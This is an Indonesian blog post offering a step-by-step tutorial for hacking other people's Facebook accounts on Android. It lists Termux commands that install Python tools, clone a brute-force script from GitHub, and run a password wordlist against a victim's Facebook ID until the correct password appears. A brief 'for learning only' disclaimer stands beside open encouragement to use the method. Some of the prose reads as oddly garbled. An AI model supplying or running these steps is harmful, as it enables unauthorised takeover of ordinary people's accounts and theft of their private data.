-->
Mamank Dzgn : Viral..!! Hack Akun Facebook Di Android Dengan Trik Simple Ini
4/ 5 stars - "Mamank Dzgn : Viral..!! Hack Akun Facebook Di Android Dengan Trik Simple Ini" Hack Akun Facebook di Android - Ada beberapa cara untuk meretas akun Facebook baik di android maupun di PC, namun kali ini saya akan membaha...

Mamank Dzgn : Viral..!! Hack Akun Facebook Di Android Dengan Trik Simple Ini



Hack Akun Facebook di Android - Ada beberapa cara untuk meretas akun Facebook baik di android maupun di PC, namun kali ini saya akan membahas cara hack akun facebok melalui perangkat android. Hack akun facebook di android tidaklah sesulit hack akun facebook di komputer dan kesannya pun hampir setara dengan hack akun facebook di komputer.
Caranya pun cukup gampang alasannya yaitu tidak membutuhkan begitu banyak aplikasi maupun skill coding yang mumpuni. Hanya dengan mengcopy perintah berikut tanpa harus bersusah payah. Simak baik - baik langkah - langkahnya, tapi sebelum memulai saya ingin mengingatkan bahwa hal ini hanya sekedar pembelajaran saja dan tidak untuk disalahgunakan. Namun sebelum memulai hack akun facebook di android, maka terlebih dahulu siapkan materi - materi ini:
  • HP Android minimal OS Android versi 5.1 (Lollipop)
  • Aplikasi termux, sanggup di download di Play Store
  • File Password.txt, sanggup di buat sendiri dengan memakai password yang kemungkinan digunakan oleh si korban. File password juga sanggup di download disini >> KLIK DISINI
  • Koneksi internet.
Setelah materi - materi disiapkan, maka lanjut ke proses hacking akunnya.
1. Setelah menginstall aplikasi termux, buka aplikasinya.
2. Sebelumnya pindahkan file password.txt yang sudah di download tadi ke folder Penyimpanan Internal.
3. Kembali ke termux dan ketik atau copy perintah berikut.
    (Copy tanpa tanda $)
   $ pkg update && pkg upgrade
   $ pkg install python2
   $ pkg install python2-dev
   $ pkg install git
   $ pip2 install mechanize
Jika ada pilihan (Y/N), ketik saja Y

4. Setelah itu, ketik lagi perintah - perintah berikut.
   $ git clone https://github.com/Senitopeng/fbbrute.git
   $ cd fbbrute
   $ python2 jomblo.py
5. Pilih salah satunya, misal No. 1\
6. Masukkan ID sasaran akun facebook yang akan di hack, misal "100009725521163". ID Target juga sanggup di dapatkan Disini.
7. Tulis password.txt sesuai lokasi penyimpanannya, bila disimpan pada penyimpanan eksternal maka isi dengan "/sdcard/password.txt"
8. Tunggu hingga proses hack selesai hingga ditampilkan password yang benar dari akun.

Metode hack ini tergolong sangat gampang namun membutuhkan kesabaran tingkat tinggi alasannya yaitu kita harus bersabar menunggu hingga password yang benar itu muncul. Makara kesimpulannya hack akun facebook di android dengan metode ini sangat dianjurkan meskipun peluang suksesnya sngat kecil, tapi mohon jangan salah gunakan.